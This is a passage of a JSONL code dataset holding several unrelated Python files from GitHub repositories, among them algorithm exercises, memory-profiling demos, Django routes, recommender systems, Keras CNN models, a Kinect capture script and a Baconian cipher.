j == i:\n dp[i][j] = dp[i-1][j-1] + triangle[i][j]\n # 그 외\n else:\n dp[i][j] = max(dp[i-1][j-1], dp[i-1][j]) + triangle[i][j]\n \n return max(dp[n-1])\n","repo_name":"J-A-Y2/Algorithm","sub_path":"프로그래머스/3/43105. 정수 삼각형/정수 삼각형.py","file_name":"정수 삼각형.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4025427052","text":"# 1) objgraph\n# https://pypi.org/project/objgraph/\nx = []\ny = [x, [x], dict(x=x)]\nimport objgraph\nobjgraph.show_refs([y], filename='sample-graph.png')\n\n#2) memory_profiler\n# https://github.com/pythonprofilers/memory_profiler\nfrom memory_profiler import profile\n\n\n@profile\ndef my_func():\n a = [1] * (10 ** 6)\n b = [2] * (2 * 10 ** 7)\n del b\n return a\n\nmy_func()\n\n# Line # Mem usage Increment Occurrences Line Contents\n# =============================================================\n# 13 67.4 MiB 67.4 MiB 1 @profile\n# 14 def my_func():\n# 15 74.9 MiB 7.5 MiB 1 a = [1] * (10 ** 6)\n# 16 227.5 MiB 152.6 MiB 1 b = [2] * (2 * 10 ** 7)\n# 17 75.1 MiB -152.4 MiB 1 del b\n# 18 75.1 MiB 0.0 MiB 1 return a\n#\n#\n#\n# Process finished with exit code 0\n\n# Time-based memory usage\n# mprof run \n# mprof plot\n\n\n# 3) guppy3\n# https://github.com/zhuyifei1999/guppy3/\n\nfrom guppy import hpy\n\nh=hpy()\nprint(h.heap())\n\n\nprint(h.heap().byid[0].sp)\n\nprint(h.iso(1,[],{}))\n\n","repo_name":"AleksNeStu/projects","sub_path":"debug/001_memory_leaks/001_debug_leaks_in_flask/03_tools.py","file_name":"03_tools.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7116575815","text":"from django.urls import path\nfrom .views import CurrentSubscriptionView, user_create, user_login, user_profile, user_logout, user_update, create_payment_info, \\\n UserClassView, UnsubscribeView, PaymentHistoryView, PaymentInfoView, delete_payment_info, DropAllClass, UserClassHistoryView\nfrom rest_framework.authtoken.views import obtain_auth_token\n\napp_name = 'user'\nurlpatterns = [\n path('register/', user_create, name='register'),\n path('login/', user_login, name='login'),\n path('profile/', user_profile, name='profile'),\n path('logout/', user_logout, name='logout'),\n path('subscription/', CurrentSubscriptionView.as_view(), name='current_subscriptions'),\n path('update/', user_update, name='update'),\n path('profile/payment_info/create/', create_payment_info, name='create_payment_info'),\n path('classes/', UserClassView.as_view(), name='user_classes'),\n path('classes/history/', UserClassHistoryView.as_view(), name='user_classes_history'),\n path('classes/drop_all/', DropAllClass.as_view(), name='user_classes_dropall'),\n path('unsubscribe/', UnsubscribeView.as_view(), name='unsubscribe'),\n path('payment/history/', PaymentHistoryView.as_view(), name='payment_history'),\n path('profile/payment_info/list', PaymentInfoView.as_view(), name='payment_info'),\n path('profile/payment_info/delete', delete_payment_info, name='delete_payment_info')\n]\n","repo_name":"tamanoir0211/csc309-project","sub_path":"PF/backend/TFC/User/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26051518101","text":"from __future__ import unicode_literals, print_function\n\nfrom django.contrib.auth import get_user_model\nfrom django.conf import settings\nfrom mogi.models.models_isa import Investigation, Assay\nfrom mogi.forms.forms_isa import UploadAssayDataFilesForm\nfrom mogi.utils.isa_upload import upload_assay_data_files_dir\n\n\n\ndef map_assays_to_files(assay_mapping, user_id, study_id, celery_obj):\n User = get_user_model()\n \n count = len(assay_mapping)\n\n user = User.objects.get(id=user_id)\n c = 0\n\n\n for row in assay_mapping:\n if celery_obj:\n celery_obj.update_state(state='RUNNING',\n meta={'current': c, 'total': count, 'status': 'Updating assays'})\n\n assay_match = Assay.objects.filter(study_id=study_id, name=row['assay'])\n\n if not assay_match:\n assay = Assay(study_id=study_id, name=row['assay'])\n assay.save()\n else:\n if row['replace'] == 'yes':\n assay_match.delete()\n assay = Assay(study_id=study_id, name=row['assay'])\n assay.save()\n else:\n assay = assay_match[0]\n\n assay_id = assay.id\n if row['save_as_link']=='yes':\n save_as_link=True\n else:\n save_as_link=False\n\n \n\n\n return 1\n\n\ndef map_assays_to_directories(assay_mapping, user_id, study_id, celery_obj):\n\n count = len(assay_mapping)\n\n user = User.objects.get(id=user_id)\n c = 0\n\n for row in assay_mapping:\n if celery_obj:\n celery_obj.update_state(state='RUNNING',\n meta={'current': c, 'total': count, 'status': 'Updating assays'})\n\n # full_dir_pth = os.path.join(edrs[row['dir_tag']]['path'], username, row['dir'])\n\n assay_match = Assay.objects.filter(study_id=study_id, name=row['assay_name'])\n\n if not assay_match:\n assay = Assay(study_id=study_id, name=row['assay_name'])\n assay.save()\n else:\n if row['replace'] == 'yes':\n assay_match.delete()\n assay = Assay(study_id=study_id, name=row['assay_name'])\n assay.save()\n else:\n assay = assay_match[0]\n\n assay_id = assay.id\n if row['save_as_link']=='yes':\n save_as_link=True\n else:\n save_as_link=False\n\n data_in = {'recursive': True,\n row['dir_tag']: row['dir'],\n 'create_assay_details': True,\n 'use_directories':True,\n 'save_as_link': save_as_link}\n\n form = UploadAssayDataFilesForm(user=User.objects.get(id=user_id),\n data=data_in,\n assayid=assay_id)\n\n if form.is_valid():\n \n create_assay_details = form.cleaned_data['create_assay_details']\n save_as_link = form.cleaned_data['save_as_link']\n\n upload_assay_data_files_dir(form.filelist,\n user.username,\n form.mapping_l,\n assay_id,\n create_assay_details,\n save_as_link,\n '')\n else:\n print(form.errors)\n if celery_obj:\n celery_obj.update_state(state='FAILURE-KNOWN',\n meta={'current': 0, 'total': 1, 'status': form.errors.as_json()})\n return 0\n c += 1\n return 1\n\n","repo_name":"computational-metabolomics/django-mogi","sub_path":"mogi/utils/assaymapping.py","file_name":"assaymapping.py","file_ext":"py","file_size_in_byte":3617,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"34659448326","text":"import os\nimport pickle\nimport time\nimport logging\n\nimport numpy\nfrom scipy.sparse import lil_matrix\nfrom scipy.sparse import csr_matrix\n\nimport tongue\nfrom parsers.parser100k import Parser100K\nfrom parsers.parser20m import Parser20M\nfrom predictors import combinedpredictor, userbasedpredictor, moviebasedpredictor, uniformpredictor, matrixfactorizationpredictor\n\n\nclass Main(object):\n\tdef __init__(self):\n\t\tself.init_logging()\n\t\trecommender_environment = {tongue.ML_100K: {'parser': Parser100K, 'data_file_name': tongue.ML_100K_FILE_NAME, 'possible_values': numpy.arange(1, 6)},\n\t\t\t\t\t\t\t\t\ttongue.ML_20M: {'parser': Parser20M, 'data_file_name': tongue.ML_20M_FILE_NAME, 'possible_values': numpy.arange(1, 5.5, 0.5)}}\n\t\tfor data_set_folder_name, environment in recommender_environment.items():\n\t\t\tif not os.path.exists(os.path.join(tongue.PARSED_DATA_PATH, data_set_folder_name)):\n\t\t\t\tos.makedirs(os.path.join(tongue.PARSED_DATA_PATH, data_set_folder_name))\n\t\t\t\tself.init_parser(data_set_folder_name, environment)\n\t\t\tself.init_uniform_predictor(data_set_folder_name, environment)\n\t\t\tself.init_user_based_predictor(data_set_folder_name, environment)\n\t\t\tself.init_movie_based_predictor(data_set_folder_name, environment)\n\t\t\tself.init_combined_predictor(data_set_folder_name, environment)\n\t\t\tself.init_matrix_factorization_predictor(data_set_folder_name)\n\n\tdef init_logging(self):\n\t\tlogging.basicConfig(format = '%(asctime)s %(levelname)s %(message)s', level = logging.DEBUG)\n\n\tdef init_parser(self, data_set_folder_name, environment):\n\t\tos.makedirs(tongue.PARSED_DATA_PATH, exist_ok=True)\n\t\tstart_time = time.time()\n\t\tlogging.info(\"Parsing: %s\" % data_set_folder_name)\n\t\tparser = environment['parser'](file_path = os.path.join(data_set_folder_name, environment['data_file_name']))\n\t\tratings_matrix = parser.create_ratings_matrix()\n\t\ttraining_set, testing_set = self.__split_ratings_matrix_to_training_and_testing(ratings_matrix, 80)\n\t\twith open(os.path.join(tongue.PARSED_DATA_PATH, data_set_folder_name, tongue.RATING_MATRIX_FILE_NAME), 'wb') as f:\n\t\t\tpickle.dump(ratings_matrix, f)\n\t\twith open(os.path.join(tongue.PARSED_DATA_PATH, data_set_folder_name, tongue.TRAINING_SET_FILE_NAME), 'wb') as f:\n\t\t\tpickle.dump(training_set, f)\n\t\twith open(os.path.join(tongue.PARSED_DATA_PATH, data_set_folder_name, tongue.TESTING_SET_FILE_NAME), 'wb') as f:\n\t\t\tpickle.dump(testing_set, f)\n\t\tlogging.info(\"Parsed in: %s seconds\" % (time.time() - start_time))\n\n\tdef init_uniform_predictor(self, data_set_folder_name, environment):\n\t\tpredictor = uniformpredictor.UniformPredictor()\n\t\tself.init_generic_predictor(data_set_folder_name, predictor, environment)\n\n\tdef init_user_based_predictor(self, data_set_folder_name, environment):\n\t\tpredictor = userbasedpredictor.UserBasedPredictor()\n\t\tself.init_generic_predictor(data_set_folder_name, predictor, environment)\n\n\tdef init_movie_based_predictor(self, data_set_folder_name, environment):\n\t\tpredictor = moviebasedpredictor.MovieBasedPredictor()\n\t\tself.init_generic_predictor(data_set_folder_name, predictor, environment)\n\n\tdef init_combined_predictor(self, data_set_folder_name, environment):\n\t\tpredictor = combinedpredictor.CombinedPredictor()\n\t\tself.init_generic_predictor(data_set_folder_name, predictor, environment)\n\n\tdef init_matrix_factorization_predictor(self, data_set_folder_name):\n\t\tpredictor = matrixfactorizationpredictor.MatrixFactorizationPredictor()\n\t\tself.init_generic_predictor(data_set_folder_name, predictor)\n\n\tdef init_generic_predictor(self, data_set_folder_name, predictor, environment = {}):\n\t\tlogging.info(\"(%s) Predicting: %s\" % (predictor.name(), data_set_folder_name))\n\t\tstart_time = time.time()\n\t\tpredictor.train(os.path.join(tongue.PARSED_DATA_PATH, data_set_folder_name, tongue.TRAINING_SET_FILE_NAME))\n\t\tlogging.info(\"(%s) Finished training for: %s. trained in: %s seconds\" % (predictor.name(), data_set_folder_name, time.time() - start_time))\n\t\tstart_time = time.time()\n\t\tmae = predictor.predict(os.path.join(tongue.PARSED_DATA_PATH, data_set_folder_name, tongue.TESTING_SET_FILE_NAME), environment.get('possible_values'))\n\t\tlogging.info(\"(%s) Finished prediction for: %s. mae: %s. predicted in: %s seconds\" % (predictor.name(), data_set_folder_name, mae, time.time() - start_time))\n\n\tdef __split_ratings_matrix_to_training_and_testing(self, ratings_matrix, training_percentage = 80):\n\t\ttraining_set, testing_set = lil_matrix(ratings_matrix.shape), lil_matrix(ratings_matrix.shape)\n\t\trows_non_zero, cols_non_zero = ratings_matrix.nonzero()\n\t\tfor i in range(len(rows_non_zero)):\n\t\t\tcurrent_row, current_col = rows_non_zero[i], cols_non_zero[i]\n\t\t\tcurrent_rating = ratings_matrix[current_row, current_col]\n\t\t\trandom_roll = numpy.random.randint(0, 100)\n\t\t\tif random_roll <= training_percentage:\n\t\t\t\ttraining_set[current_row, current_col] = current_rating\n\t\t\telse:\n\t\t\t\ttesting_set[current_row, current_col] = current_rating\n\n\t\treturn csr_matrix(training_set), csr_matrix(testing_set)\n\n\nif __name__ == \"__main__\":\n\tMain()\n","repo_name":"zingero/recommenders","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6090235912","text":"# coding: utf-8\n\nimport numpy as np\nimport sys\nimport os\n\nfrom PIL import Image\n\nfrom pylibfreenect2 import Freenect2, SyncMultiFrameListener\nfrom pylibfreenect2 import FrameType, Registration, Frame\nfrom pylibfreenect2 import createConsoleLogger, setGlobalLogger\nfrom pylibfreenect2 import LoggerLevel\n\ntry:\n from pylibfreenect2 import OpenGLPacketPipeline\n pipeline = OpenGLPacketPipeline()\nexcept:\n try:\n from pylibfreenect2 import OpenCLPacketPipeline\n pipeline = OpenCLPacketPipeline()\n except:\n from pylibfreenect2 import CpuPacketPipeline\n pipeline = CpuPacketPipeline()\nprint(\"Packet pipeline:\", type(pipeline).__name__)\n\n# Create and set logger\nlogger = createConsoleLogger(LoggerLevel.Debug)\nsetGlobalLogger(logger)\n\nfn = Freenect2()\nnum_devices = fn.enumerateDevices()\nif num_devices == 0:\n print(\"No device connected!\")\n sys.exit(1)\n\nserial = fn.getDeviceSerialNumber(0)\ndevice = fn.openDevice(serial, pipeline=pipeline)\n\nlistener = SyncMultiFrameListener(\n FrameType.Color | FrameType.Ir | FrameType.Depth)\n\n# Register listeners\ndevice.setColorFrameListener(listener)\ndevice.setIrAndDepthFrameListener(listener)\n\ndevice.start()\n\n# NOTE: must be called after device.start()\nregistration = Registration(device.getIrCameraParams(),\n device.getColorCameraParams())\n\nundistorted = Frame(512, 424, 4)\nregistered = Frame(512, 424, 4)\n\n# Optinal parameters for registration\n# set True if you need\nneed_bigdepth = False\nneed_color_depth_map = False\n\nbigdepth = Frame(1920, 1082, 4) if need_bigdepth else None\ncolor_depth_map = np.zeros((424, 512), np.int32).ravel() \\\n if need_color_depth_map else None\n\n#while True:\nframes = listener.waitForNewFrame()\n\ncolor = frames[\"color\"]\nir = frames[\"ir\"]\ndepth = frames[\"depth\"]\n\nregistration.apply(color, depth, undistorted, registered,\n bigdepth=bigdepth,\n color_depth_map=color_depth_map)\n\n#VIS HERE\nj = Image.fromarray(color.asarray())\nj.save(os.path.join(\"/home/user\", \"testimg.png\"))\n# YAY\n##\n\nlistener.release(frames)\n\n\ndevice.stop()\ndevice.close()\n\nsys.exit(0)\n","repo_name":"APoljakow/Projekt360","sub_path":"DataGenCode/singleImageTest/storeImage.py","file_name":"storeImage.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31979024638","text":"lookup = {'A':'aaaaa', 'B':'aaaab', 'C':'aaaba', 'D':'aaabb', 'E':'aabaa', \n 'F':'aabab', 'G':'aabba', 'H':'aabbb', 'I':'abaaa', 'J':'abaab', \n 'K':'ababa', 'L':'ababb', 'M':'abbaa', 'N':'abbab', 'O':'abbba', \n 'P':'abbbb', 'Q':'baaaa', 'R':'baaab', 'S':'baaba', 'T':'baabb', \n 'U':'babaa', 'V':'babab', 'W':'babba', 'X':'babbb', 'Y':'bbaaa', 'Z':'bbaab'} \n \n# Function to encrypt the string according to the cipher provided \ndef encrypt(message): \n cipher = '' \n for letter in message: \n # checks for space \n if(letter != ' '): \n # adds the ciphertext corresponding to the \n # plaintext from the dictionary \n cipher += lookup[letter] \n else: \n # adds space \n cipher += ' '\n \n return cipher \n\ndef main(): \n message = input(\"Please enter the plaintext : \")\n result = encrypt(message.upper()) \n print (result) \n \n \n#Executes the main function \nif __name__ == '__main__': \n main() \n","repo_name":"SeresAdrian/Crypto-Project","sub_path":"encryption files/encryption/baconianenc.py","file_name":"baconianenc.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"5820716824","text":"# https://leetcode.com/contest/8/problems/add-strings/\n\n\nclass Solution(object):\n def addStrings(self, num1, num2):\n \"\"\"\n :type num1: str\n :type num2: str\n :rtype: str\n \"\"\"\n if num1 == \"\":\n return int(num2)\n\n if num2 == \"\":\n return int(num1)\n\n p1 = len(num1) - 1\n p2 = len(num2) - 1\n\n greater = max(len(num1), len(num2))\n total = \"\"\n carry = 0\n\n while greater > 0:\n digit1 = int(num1[p1]) if p1 >= 0 else 0\n digit2 = int(num2[p2]) if p2 >= 0 else 0\n\n sum = carry + digit1 + digit2\n final_digit = sum % 10\n carry = sum // 10\n\n total = str(final_digit) + total\n greater -= 1\n\n p1 -= 1\n p2 -= 1\n\n if carry != 0:\n total = str(carry) + total\n\n return total\n\nimport unittest\n\nclass UnitTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.soln = Solution()\n\n def testAddStrings(self):\n self.assertEqual(self.soln.addStrings(\"112\", \"113\"), \"225\")\n self.assertEqual(self.soln.addStrings(\"10\", \"5\"), \"15\")\n self.assertEqual(self.soln.addStrings(\"1000\", \"5\"), \"1005\")\n self.assertEqual(self.soln.addStrings(\"1\", \"9\"), \"10\")\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"ssarangi/algorithms","sub_path":"leetcode/contest8/add_strings.py","file_name":"add_strings.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"26992872923","text":"from collections import deque\n\n# 0으로 이루어진 bridge를 만듦\ndef buildBridge(bridgeLength):\n bridge = deque([])\n for i in range(bridgeLength):\n bridge.append(0)\n return bridge\n\ndef solution(bridge_length, weight, truck_weights):\n bridge = buildBridge(bridge_length)\n truckDeq = deque(truck_weights)\n \n timeCnt = 0\n totalWeightSum = 0\n while True:\n if len(truckDeq) > 0: # 남은 트럭이 있을 때\n \n # 다음 트럭이 들어올 수 있으면\n if totalWeightSum - bridge[0] + truckDeq[0] <= weight:\n totalWeightSum -= bridge[0]\n bridge.popleft()\n bridge.append(truckDeq.popleft())\n timeCnt += 1\n \n totalWeightSum += bridge[-1]\n\n else: # 다음 트럭이 들어오지 못하면\n totalWeightSum -= bridge[0]\n bridge.popleft()\n bridge.append(0)\n timeCnt += 1\n\n else: # 남은 트럭이 없으면\n\n return timeCnt + bridge_length","repo_name":"kwonars/CodingTest","sub_path":"Programmers/[고득점Kit] 스택,큐 - 다리를 지나는 트럭.py","file_name":"[고득점Kit] 스택,큐 - 다리를 지나는 트럭.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37430436160","text":"import numpy as np\nfrom keras.models import Sequential, load_model\nfrom keras.layers import LSTM, Recurrent, Activation, Dropout, MaxPooling2D, Convolution2D, Dense, Flatten\nfrom keras.preprocessing.image import ImageDataGenerator, Iterator, K\nfrom create_input import load_sequences_with_paths\nfrom PIL import Image\nimport random\nfrom keras.applications.vgg16 import VGG16\n\n\nclass PHImageIterator(Iterator):\n def __init__(self, directory, image_data_generator, target_size=(90, 160), color_mode='rgb',\n classes=None, class_mode='categorical',\n batch_size=32, shuffle=True, seed=88,\n train=True, test_size=0.2, labels_dict=None):\n seq_img_paths, seq_labels, instances, labels_list = load_sequences_with_paths(directory, labels_dict)\n if labels_dict is not None:\n labels_list = list(range(max(labels_dict.values())+1))\n print(labels_list)\n n_test_instances = int(test_size*len(seq_labels))\n n_train_instances = len(seq_labels) - n_test_instances\n train_test = [1]*n_train_instances + [0]*n_test_instances\n random.shuffle(train_test)\n if train:\n idx = [i for i,v in enumerate(train_test) if v == 1]\n else:\n idx = [i for i,v in enumerate(train_test) if v == 0]\n\n seq_img_paths = [seq_img_paths[i] for i in idx]\n seq_labels = [seq_labels[i] for i in idx]\n\n\n sample = [np.array(Image.open(paths[random.randint(0, len(paths) - 1)])) / 255.0 for paths in seq_img_paths]\n sample = [img for img in sample if len(img.shape)==3]\n sample = np.array(sample)\n print(sample.shape)\n image_data_generator.fit(sample)\n\n self.paths, self.labels = [],[]\n for i in range(len(seq_labels)):\n self.paths += seq_img_paths[i]\n self.labels += seq_labels[i]\n\n instances = [instances[i] for i in idx]\n\n n_instances = len(instances)\n self.n_labels = len(labels_list)\n super(PHImageIterator, self).__init__(n_instances, batch_size, shuffle, seed)\n self.directory = directory\n self.image_data_generator = image_data_generator\n self.target_size = target_size\n self.image_size = self.target_size + (3,)\n\n def next(self):\n with self.lock:\n index_array, current_index, current_batch_size = next(self.index_generator)\n\n batch_x = np.zeros((current_batch_size, ) + self.image_size, dtype=K.floatx())\n batch_y = np.zeros((current_batch_size, self.n_labels), dtype=int)\n for i, idx in enumerate(index_array):\n path = self.paths[idx]\n label = self.labels[idx]\n img = np.array(Image.open(path))\n #print(img.shape, batch_x[i, j].shape)\n batch_x[i,] = img/255.0\n batch_y[i, label] = 1\n return batch_x, batch_y\n\nclass PHImageDataGenerator(ImageDataGenerator):\n def flow_from_directory(self, directory,\n target_size=(90, 160), color_mode='rgb',\n classes=None, class_mode='categorical',\n batch_size=32, shuffle=True, seed=88,\n save_to_dir=None,\n save_prefix='',\n save_format='jpeg',\n follow_links=False,\n train=True, labels_dict=None\n ):\n return PHImageIterator(directory, self, target_size=target_size, color_mode=color_mode, classes=classes,\n class_mode=color_mode, batch_size=batch_size, shuffle=shuffle, seed=seed,\n train=train, labels_dict=labels_dict)\n\n\nclass CNN(object):\n def __init__(self, n_classes, nb_filters=[128,96,64],batch_size=64, n_epochs=500, optimizer=\"adam\", learning_rate=0.001, saved_model=None):\n self.batch_size = batch_size\n self.n_epochs = n_epochs\n self.optimizer = optimizer\n self.learning_rate = learning_rate\n self.model = None\n self.n_classes = n_classes\n self.saved_model = saved_model\n self.nb_filters = nb_filters\n\n def create_model(self):\n if self.saved_model is not None:\n self.model = load_model(self.saved_model)\n else:\n self.model = Sequential()\n self.model.add(Convolution2D(self.nb_filters[0], 3, 3, input_shape=(90, 160, 3)))\n self.model.add(Activation('relu'))\n self.model.add(MaxPooling2D(pool_size=(2, 2)))\n self.model.add(Dropout(0.25))\n for nb_filter in self.nb_filters[1:]:\n self.model.add(Convolution2D(nb_filter, 3, 3))\n self.model.add(Activation('relu'))\n self.model.add(MaxPooling2D(pool_size=(2, 2)))\n self.model.add(Dropout(0.25))\n self.model.add(Flatten())\n\n self.model.add(Dense(self.nb_filters[-1])) # returns a sequence of vectors of dimension 32\n self.model.add(Dense(self.n_classes, activation='softmax'))\n\n self.model.compile(loss='categorical_crossentropy',\n optimizer=self.optimizer,\n metrics=['accuracy', 'fmeasure', 'categorical_accuracy'],\n learning_rate=self.learning_rate)\n\n def fit(self, X, Y):\n self.create_model()\n self.model.fit(X, Y,\n batch_size=self.batch_size,\n nb_epoch=self.n_epochs,\n shuffle=True)\n\n def fit_generator(self, train_generator, validation_generator=None, samples_per_epoch=4096, nb_epoch=50,\n nb_val_samples=400):\n self.create_model()\n self.model.fit_generator(\n train_generator,\n samples_per_epoch=samples_per_epoch,\n nb_epoch=nb_epoch,\n validation_data=validation_generator,\n nb_val_samples=nb_val_samples)\n\n def predict_proba(self, X):\n self.model.predict_proba(X)\n\n def predict(self, X):\n self.model.predict_proba(X)\n\n\nclass CNNVGG16(CNN):\n def create_model(self):\n if self.saved_model is not None:\n self.model = load_model(self.saved_model)\n else:\n self.model = Sequential()\n self.model.add(VGG16(weights='imagenet', include_top=False, input_shape=(90,160,3)))\n self.model.add(Flatten())\n self.model.add(Dense(64)) # returns a sequence of vectors of dimension 32\n self.model.add(Dense(self.n_classes, activation='softmax'))\n\n self.model.compile(loss='categorical_crossentropy',\n optimizer=self.optimizer,\n metrics=['accuracy', 'fmeasure', 'categorical_accuracy'],\n learning_rate=self.learning_rate)","repo_name":"aomelo/posrec","sub_path":"cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":6909,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"27645902704","text":"from sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport pandas as pd\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport re\n\n\ndef get_title_from_index(index,df):\n\n return df[df.index == index][\"OrganizationName\"].values[0]\n\ndef get_index_from_title(title,df):\n\n return df[df.OrganizationName == title][\"index\"].values[0]\n\ndef extract_database():\n\n df = pd.read_csv(\"ccc-organizations-2011_1.csv\")\n return df\n\ndef pre_process(tweets):\n\n for i in range(0, len(tweets)):\n\n if (tweets[i] is not None):\n\n if(tweets[i]!=tweets[i]):\n tweets[i]=\"\"\n\n tweets[i] = tweets[i].lower() # To lower case\n tweets[i] = tweets[i].replace('@','') # remove @\n tweets[i] = tweets[i].replace('#','') # remove #\n tweets[i] = remove_urls(tweets[i]) # remove URL\n tweets[i] = remove_emojis(tweets[i]) # remove emojis\n tweets[i] = \"\".join(j for j in tweets[i] if j not in (\n \"?\", \".\", \";\", \":\", \"!\", \"-\", \",\", \"[\", \"]\", \"(\", \")\", \"’\", \"‘\", '\"', \"$\", \"'\", \"“\", \"”\", \"•\", \"=\", \"+\",\n \"%\", \"/\", \"&\", \"|\", \"~\")) # remove punctuations\n\n return tweets\n\ndef remove_urls (str):\n\n str = re.sub(r'(https|http)?:\\/\\/(\\w|\\.|\\/|\\?|\\=|\\&|\\%)*\\b', '', str, flags=re.MULTILINE)\n return(str)\n\n\ndef remove_emojis(data):\n\n emoji = re.compile(\"[\"\n u\"\\U0001F600-\\U0001F64F\" # emoticons\n u\"\\U0001F300-\\U0001F5FF\" # symbols & pictographs\n u\"\\U0001F680-\\U0001F6FF\" # transport & map symbols\n u\"\\U0001F1E0-\\U0001F1FF\" # flags (iOS)\n u\"\\U00002500-\\U00002BEF\" # chinese char\n u\"\\U00002702-\\U000027B0\"\n u\"\\U00002702-\\U000027B0\"\n u\"\\U000024C2-\\U0001F251\"\n u\"\\U0001f926-\\U0001f937\"\n u\"\\U00010000-\\U0010ffff\"\n u\"\\u2640-\\u2642\" \n u\"\\u2600-\\u2B55\"\n u\"\\u200d\"\n u\"\\u23cf\"\n u\"\\u23e9\"\n u\"\\u231a\"\n u\"\\ufe0f\" # dingbats\n u\"\\u3030\"\n \"]+\", re.UNICODE)\n return re.sub(emoji, '', data)\n\n\ndef generate_movie_data(description,actors):\n\n result=[]\n for i in range(0,len(description)):\n result.append(description[i]+\" \"+actors[i])\n\n return result\n\ndef print_similar(sorted_movies,movie_index,df):\n\n print(\"\\nRecommendations : \\n\")\n\n i = 0\n for element in sorted_movies:\n\n if (element[0] != movie_index):\n print(get_title_from_index(element[0], df))\n i = i + 1\n if i > 50:\n break\n\n\ndef main():\n\n features = ['Description', 'City']\n df=extract_database()\n df['index']=df.index\n description = df['Description'].to_list()\n city=df['City'].to_list()\n description=pre_process(description)\n city=pre_process(city)\n charity_data=generate_movie_data(description,city)\n\n cv=CountVectorizer()\n count_matrix=cv.fit_transform(charity_data)\n\n\n cos_sim=cosine_similarity(count_matrix)\n sample_movie=input(\"Enter the charity user had previously donated to: \")\n\n chairty_index=get_index_from_title(sample_movie,df)\n similar_charities=list(enumerate(cos_sim[chairty_index]))\n sorted_charities=sorted(similar_charities,key=lambda x:x[1],reverse=True)\n\n print_similar(sorted_charities,chairty_index,df)\n\nif __name__ == \"__main__\":\n\n main()\n\n\n","repo_name":"gouriginde/Summer2021","sub_path":"Zeeshan/us_charities.py","file_name":"us_charities.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2788166847","text":"# 2. Напишите программу, которая найдёт произведение пар чисел списка.\n# Парой считаем первый и последний элемент, второй и предпоследний и т.д.\n# in\n# 4\n\n# out\n# [2, 5, 8, 10]\n# [20, 40]\n\nfrom random import sample\n\n\ndef random_numbers(count):\n if count < 0:\n print(\"Отрицательное число\")\n return []\n\n numbers = sample(range(1, count * 2), count)\n return numbers\n\n\ndef pairs_nums(list_nums: list):\n res_list = []\n len_list = len(list_nums)\n\n for k in range(len_list // 2):\n res_list.append(list_nums[k] * list_nums[len_list - k - 1])\n\n if len_list % 2:\n res_list.append(list_nums[len_list // 2])\n return res_list\n\n\nfinal_list = random_numbers(int(input(\"Введите число: \")))\nprint(final_list)\nprint(pairs_nums(final_list))","repo_name":"kirillnaumenk0/Python_-3-","sub_path":"№2.py","file_name":"№2.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20022208677","text":"#!/usr/bin/env python3\n\"\"\"execute 'pytest' to initate test\"\"\"\n\nfrom circle_class import (Circle)\n\n\ndef test_s1():\n c = Circle(2)\n assert c._radius == 2\n assert c.radius == 2\n assert type(c) == Circle\n\n\ndef test_s2():\n c = Circle(2)\n assert c._diameter == 4\n assert c.diameter == 4\n\n\ndef test_s3():\n c = Circle(4)\n c.diameter = 2\n assert c.diameter == 2\n assert c.radius == 1\n\n\ndef test_s4():\n c = Circle(2)\n assert c.area == 12.566370614359172\n try:\n c.area = 40\n except AttributeError:\n pass\n\n\ndef test_s5():\n c = Circle.from_diameter(8)\n assert c.radius == 4\n\n\ndef test_s6():\n c = Circle(2)\n assert repr(c) == 'Circle(2)'\n\n\ndef test_s7():\n c1 = Circle(2)\n c2 = Circle(4)\n assert (c1 + c2 == Circle(6))\n assert c1*3 == Circle(6)\n assert 3*c1 == Circle(6)\n\n\ndef test_s8():\n c1 = Circle(2)\n c2 = Circle(4)\n assert c1 < c2\n assert c2 > c1\n c3 = Circle(2)\n assert c1 == c3\n","repo_name":"HawkeyeUW/Self_Paced-Online","sub_path":"students/rgpag/lesson08/test_circle.py","file_name":"test_circle.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"17983697001","text":"import sys\nsys.stdin = open('input/boj_12904_A와 B.txt', 'r')\n\nORIGIN = list(input())\nCOMP = list(input())\n\n# HEADER = COMP[0:len(ORIGIN)]\n# OFFSET = COMP[len(ORIGIN):]\n#\n# temp = OFFSET[0]\n# for i in OFFSET[1:]:\n# if temp == i:\n# temp = 'A'\n# else:\n# temp = 'B'\n#\n# if (HEADER == ORIGIN and temp == 'B') or (HEADER != ORIGIN and temp == 'A'):\n# print(0)\n# else:\n# 